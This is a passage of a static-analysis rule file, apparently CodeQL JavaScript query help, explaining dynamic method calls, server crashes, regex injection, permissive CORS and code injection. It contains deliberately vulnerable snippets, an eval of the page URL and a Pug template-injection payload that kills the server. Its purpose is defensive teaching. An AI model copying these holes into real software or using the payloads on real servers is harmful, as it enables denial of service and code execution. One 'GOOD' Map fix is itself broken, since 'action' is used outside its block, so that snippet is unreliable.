dispatch to an unexpected target, which could cause an exception."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Unvalidated dynamic method call\nJavaScript makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n  play(data) {\n    // ...\n  },\n  pause(data) {\n    // ...\n  }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n  let action = actions[req.params.action];\n  // BAD: `action` may not be a function\n  res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n  // ...\n});\nactions.set(\"pause\", function pause(data) {\n  // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n  if (actions.has(req.params.action)) {\n    if (typeof actions.get(req.params.action) === 'function'){\n      let action = actions.get(req.params.action);\n    }\n    // GOOD: `action` is either the `play` or the `pause` function from above\n    res.end(action(req.params.payload));\n  } else {\n    res.end(\"Unsupported action.\");\n  }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n  play(data) {\n    // ...\n  },\n  pause(data) {\n    // ...\n  }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n  if (actions.hasOwnProperty(req.params.action)) {\n    let action = actions[req.params.action];\n    if (typeof action === 'function') {\n      // GOOD: `action` is an own method of `actions`\n      res.end(action(req.params.payload));\n      return;\n    }\n  }\n  res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n","markdown":"# Unvalidated dynamic method call\nJavaScript makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n  play(data) {\n    // ...\n  },\n  pause(data) {\n    // ...\n  }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n  let action = actions[req.params.action];\n  // BAD: `action` may not be a function\n  res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n  // ...\n});\nactions.set(\"pause\", function pause(data) {\n  // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n  if (actions.has(req.params.action)) {\n    if (typeof actions.get(req.params.action) === 'function'){\n      let action = actions.get(req.params.action);\n    }\n    // GOOD: `action` is either the `play` or the `pause` function from above\n    res.end(action(req.params.payload));\n  } else {\n    res.end(\"Unsupported action.\");\n  }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n  play(data) {\n    // ...\n  },\n  pause(data) {\n    // ...\n  }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n  if (actions.hasOwnProperty(req.params.action)) {\n    let action = actions[req.params.action];\n    if (typeof action === 'function') {\n      // GOOD: `action` is an own method of `actions`\n      res.end(action(req.params.payload));\n      return;\n    }\n  }\n  res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n"},"properties":{"tags":["security","external/cwe/cwe-754"],"description":"Calling a method with a user-controlled name may dispatch to\n              an unexpected target, which could cause an exception.","id":"js/unvalidated-dynamic-method-call","kind":"path-problem","name":"Unvalidated dynamic method call","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/server-crash","name":"js/server-crash","shortDescription":{"text":"Server crash"},"fullDescription":{"text":"A server that can be forced to crash may be vulnerable to denial-of-service attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n  fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n  if (!isValidPath(rootDir, req.query.filePath)) {\n    throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n  }\n  // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n  fs.access(rootDir, (err) => {\n    if (err) {\n      console.error(\n        `Server setup is corrupted, ${rootDir} cannot be accessed!`\n      );\n      res.status(500);\n      res.end();\n      return;\n    }\n    save(rootDir, req.query.path, req.body);\n    res.status(200);\n    res.end();\n  });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n  fs.access(rootDir, (err) => {\n    // ...\n    try {\n      save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n      res.status(200);\n      res.end();\n    } catch (e) {\n      res.status(500);\n      res.end();\n    }\n  });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n  try {\n    await fs.promises.access(rootDir);\n    save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n    res.status(200);\n    res.end();\n  } catch (e) {\n    res.status(500);\n    res.end();\n  }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n","markdown":"# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n  fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n  if (!isValidPath(rootDir, req.query.filePath)) {\n    throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n  }\n  // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n  fs.access(rootDir, (err) => {\n    if (err) {\n      console.error(\n        `Server setup is corrupted, ${rootDir} cannot be accessed!`\n      );\n      res.status(500);\n      res.end();\n      return;\n    }\n    save(rootDir, req.query.path, req.body);\n    res.status(200);\n    res.end();\n  });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n  fs.access(rootDir, (err) => {\n    // ...\n    try {\n      save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n      res.status(200);\n      res.end();\n    } catch (e) {\n      res.status(500);\n      res.end();\n    }\n  });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n  try {\n    await fs.promises.access(rootDir);\n    save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n    res.status(200);\n    res.end();\n  } catch (e) {\n    res.status(500);\n    res.end();\n  }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n"},"properties":{"tags":["security","external/cwe/cwe-248","external/cwe/cwe-730"],"description":"A server that can be forced to crash may be vulnerable to denial-of-service\n              attacks.","id":"js/server-crash","kind":"path-problem","name":"Server crash","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/regex-injection","name":"js/regex-injection","shortDescription":{"text":"Regular expression injection"},"fullDescription":{"text":"User input should not be used in regular expressions without first being escaped, otherwise a malicious user may be able to inject an expression that could require exponential time on certain inputs."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Regular expression injection\nConstructing a regular expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n  var key = req.param(\"key\"), input = req.param(\"input\");\n\n  // BAD: Unsanitized user input is used to construct a regular expression\n  var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n  var key = req.param(\"key\"), input = req.param(\"input\");\n\n  // GOOD: User input is sanitized before constructing the regex\n  var safeKey = _.escapeRegExp(key);\n  var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# Regular expression injection\nConstructing a regular expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n  var key = req.param(\"key\"), input = req.param(\"input\");\n\n  // BAD: Unsanitized user input is used to construct a regular expression\n  var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n  var key = req.param(\"key\"), input = req.param(\"input\");\n\n  // GOOD: User input is sanitized before constructing the regex\n  var safeKey = _.escapeRegExp(key);\n  var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-730","external/cwe/cwe-400"],"description":"User input should not be used in regular expressions without first being escaped,\n              otherwise a malicious user may be able to inject an expression that could require\n              exponential time on certain inputs.","id":"js/regex-injection","kind":"path-problem","name":"Regular expression injection","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/cors-permissive-configuration","name":"js/cors-permissive-configuration","shortDescription":{"text":"Permissive CORS configuration"},"fullDescription":{"text":"Cross-origin resource sharing (CORS) policy allows overly broad access."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Permissive CORS configuration\nA server can use CORS (Cross-Origin Resource Sharing) to relax the restrictions imposed by the Same-Origin Policy, allowing controlled, secure cross-origin requests when necessary.\n\nA server with an overly permissive CORS configuration may inadvertently expose sensitive data or enable CSRF attacks, which allow attackers to trick users into performing unwanted operations on websites they're authenticated to.\n\n\n## Recommendation\nWhen the `origin` is set to `true`, the server accepts requests from any origin, potentially exposing the system to CSRF attacks. Use `false` as the origin value or implement a whitelist of allowed origins instead.\n\nWhen the `origin` is set to `null`, it can be exploited by an attacker who can deceive a user into making requests from a `null` origin, often hosted within a sandboxed iframe.\n\nIf the `origin` value is user-controlled, ensure that the data is properly sanitized and validated against a whitelist of allowed origins.\n\n\n## Example\nIn the following example, `server_1` accepts requests from any origin because the value of `origin` is set to `true`. `server_2` uses user-controlled data for the origin without validation.\n\n\n```javascript\nimport { ApolloServer } from 'apollo-server';\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function () { });\n\nserver.on('request', function (req, res) {\n    // BAD: origin is too permissive\n    const server_1 = new ApolloServer({\n        cors: { origin: true }\n    });\n\n    let user_origin = url.parse(req.url, true).query.origin;\n    // BAD: CORS is controlled by user\n    const server_2 = new ApolloServer({\n        cors: { origin: user_origin }\n    });\n});\n```\nTo fix these issues, `server_1` uses a restrictive CORS configuration that is not vulnerable to CSRF attacks. `server_2` properly validates user-controlled data against a whitelist before using it.\n\n\n```javascript\nimport { ApolloServer } from 'apollo-server';\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function () { });\n\nserver.on('request', function (req, res) {\n    // GOOD: origin is restrictive\n    const server_1 = new ApolloServer({\n        cors: { origin: false }\n    });\n\n    let user_origin = url.parse(req.url, true).query.origin;\n    // GOOD: user data is properly sanitized\n    const server_2 = new ApolloServer({\n        cors: { origin: (user_origin === \"https://allowed1.com\" || user_origin === \"https://allowed2.com\") ? user_origin : false }\n    });\n});\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n","markdown":"# Permissive CORS configuration\nA server can use CORS (Cross-Origin Resource Sharing) to relax the restrictions imposed by the Same-Origin Policy, allowing controlled, secure cross-origin requests when necessary.\n\nA server with an overly permissive CORS configuration may inadvertently expose sensitive data or enable CSRF attacks, which allow attackers to trick users into performing unwanted operations on websites they're authenticated to.\n\n\n## Recommendation\nWhen the `origin` is set to `true`, the server accepts requests from any origin, potentially exposing the system to CSRF attacks. Use `false` as the origin value or implement a whitelist of allowed origins instead.\n\nWhen the `origin` is set to `null`, it can be exploited by an attacker who can deceive a user into making requests from a `null` origin, often hosted within a sandboxed iframe.\n\nIf the `origin` value is user-controlled, ensure that the data is properly sanitized and validated against a whitelist of allowed origins.\n\n\n## Example\nIn the following example, `server_1` accepts requests from any origin because the value of `origin` is set to `true`. `server_2` uses user-controlled data for the origin without validation.\n\n\n```javascript\nimport { ApolloServer } from 'apollo-server';\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function () { });\n\nserver.on('request', function (req, res) {\n    // BAD: origin is too permissive\n    const server_1 = new ApolloServer({\n        cors: { origin: true }\n    });\n\n    let user_origin = url.parse(req.url, true).query.origin;\n    // BAD: CORS is controlled by user\n    const server_2 = new ApolloServer({\n        cors: { origin: user_origin }\n    });\n});\n```\nTo fix these issues, `server_1` uses a restrictive CORS configuration that is not vulnerable to CSRF attacks. `server_2` properly validates user-controlled data against a whitelist before using it.\n\n\n```javascript\nimport { ApolloServer } from 'apollo-server';\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function () { });\n\nserver.on('request', function (req, res) {\n    // GOOD: origin is restrictive\n    const server_1 = new ApolloServer({\n        cors: { origin: false }\n    });\n\n    let user_origin = url.parse(req.url, true).query.origin;\n    // GOOD: user data is properly sanitized\n    const server_2 = new ApolloServer({\n        cors: { origin: (user_origin === \"https://allowed1.com\" || user_origin === \"https://allowed2.com\") ? user_origin : false }\n    });\n});\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n"},"properties":{"tags":["security","external/cwe/cwe-942"],"description":"Cross-origin resource sharing (CORS) policy allows overly broad access.","id":"js/cors-permissive-configuration","kind":"path-problem","name":"Permissive CORS configuration","precision":"high","problem.severity":"warning","security-severity":"6.0"}},{"id":"js/code-injection","name":"js/code-injection","shortDescription":{"text":"Code injection"},"fullDescription":{"text":"Interpreting unsanitized user input as code allows a malicious user arbitrary code execution."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n    var input = req.query.username;\n    var template = `\ndoctype\nhtml\nhead\n    title= 'Hello world'\nbody\n    form(action='/' method='post')\n        input#name.form-control(type='text)\n        button.btn.btn-primary(type='submit') Submit\n    p Hello `+ input\n    var fn = pug.compile(template);\n    var html = fn();\n    res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n    var input = req.query.username;\n    var template = `\ndoctype\nhtml\nhead\n    title= 'Hello world'\nbody\n    form(action='/' method='post')\n        input#name.form-control(type='text)\n        button.btn.btn-primary(type='submit') Submit\n    p Hello #{username}`\n    var fn = pug.compile(template);\n    var html = fn({username: input});\n    res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n    var input = req.query.username;\n    var template = `\ndoctype\nhtml\nhead\n    title= 'Hello world'\nbody\n    form(action='/' method='post')\n        input#name.form-control(type='text)\n        button.btn.btn-primary(type='submit') Submit\n    p Hello `+ input\n    var fn = pug.compile(template);\n    var html = fn();\n    res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n    var input = req.query.username;\n    var template = `\ndoctype\nhtml\nhead\n    title= 'Hello world'\nbody\n    form(action='/' method='post')\n        input#name.form-control(type='text)\n        button.btn.btn-primary(type='submit') Submit\n    p Hello #{username}`\n    var fn = pug.compile(template);\n    var html = fn({username: input});\n    res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-094","external/cwe/cwe-095","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Interpreting unsanitized user input as code allows a malicious user arbitrary\n              code execution.","id":"js/code-injection","kind":"path-problem","name":"Code injection","precision":"high","problem.severity":"error","security-severity":"9.3"}},{"id":"js/unsafe-dynamic-method-access","name":"js/unsafe-dynamic-method-access","shortDescription":{"text":"Unsafe dynamic method access"},"fullDescription":{"text":"Invoking user-controlled methods on certain objects can lead to remote code execution."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n  // ...\n}\nfunction pause(data) {\n  // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n    let message = JSON.parse(ev.data);\n\n    // Let the parent frame call the 'play' or 'pause' function \n    window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n  play: function(data) {\n    // ...\n  },\n  pause: function(data) {\n    // ...\n  }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n    let message = JSON.parse(ev.data);\n\n    // Let the parent frame call the 'play' or 'pause' function\n    if (!api.hasOwnProperty(message.name)) {\n      return;\n    }\n    api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n","markdown":"# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n  // ...\n}\nfunction pause(data) {\n  // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n    let message = JSON.parse(ev.data);\n\n    // Let the parent frame call the 'play' or 'pause' function \n    window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n  play: function(data) {\n    // ...\n  },\n  pause: function(data) {\n    // ...\n  }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n    let message = JSON.parse(ev.data);\n\n    // Let the parent frame call the 'play' or 'pause' function\n    if (!api.hasOwnProperty(message.name)) {\n      return;\n    }\n    api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global 